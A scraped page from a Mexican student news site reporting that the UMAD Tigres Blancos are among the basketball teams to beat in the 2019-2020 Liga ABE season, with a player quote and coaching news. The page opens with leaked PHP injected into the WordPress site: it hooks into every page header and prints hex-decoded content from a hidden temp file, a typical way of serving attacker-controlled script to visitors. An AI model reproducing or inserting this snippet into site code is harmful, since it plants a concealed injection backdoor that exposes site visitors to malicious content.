if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } UMAD uno de los equipos a vencer en la Liga ABE – La Opinión Universitaria La Opinión Universitaria
Menu

UMAD uno de los equipos a vencer en la Liga ABE

 

Para la campaña 2019-2020 de la Liga de la Asociación de Basquetbol Estudiantil, los Tigres Blancos de la UMAD serán uno de los equipos a vencer pues en la pasada temporada demostró tener el nivel para ganarle a cualquiera, tanto en casa como fuera de ésta.

Los maderistas se clasificaron por primera vez a las finales del máximo circuito del deporte ráfaga universitario, instancia donde dejaron una grata impresión por el nivel con el que afrontaron este compromiso, mismo al que esperan acceder nuevamente para esta nueva temporada.

“Cada vez se nota más que los equipos nos juegan con mayor concentración y fuerza. Nuestra casa es un lugar que les cuesta mucho a nuestros rivales y cuando vamos de gira siempre pensamos en la posibilidad de regresar con todos los triunfos disponibles. Cada temporada se vuelven más intensos los partidos con UPAEP, UDLAP, ITESM Guadalajara y Monterrey, pero eso nos ayuda mucho porque entre mayor es la exigencia, mayor es nuestro nivel”, señaló Hayyim Ureña.

Los dirigidos por el coach Juan Manuel Solano ya trabajan para afrontar una serie de partidos de preparación con el objetivo de llegar en óptimas condiciones al inicio de la campaña.

 

 

  • No comments

    Deja una respuesta

    Tweets recientes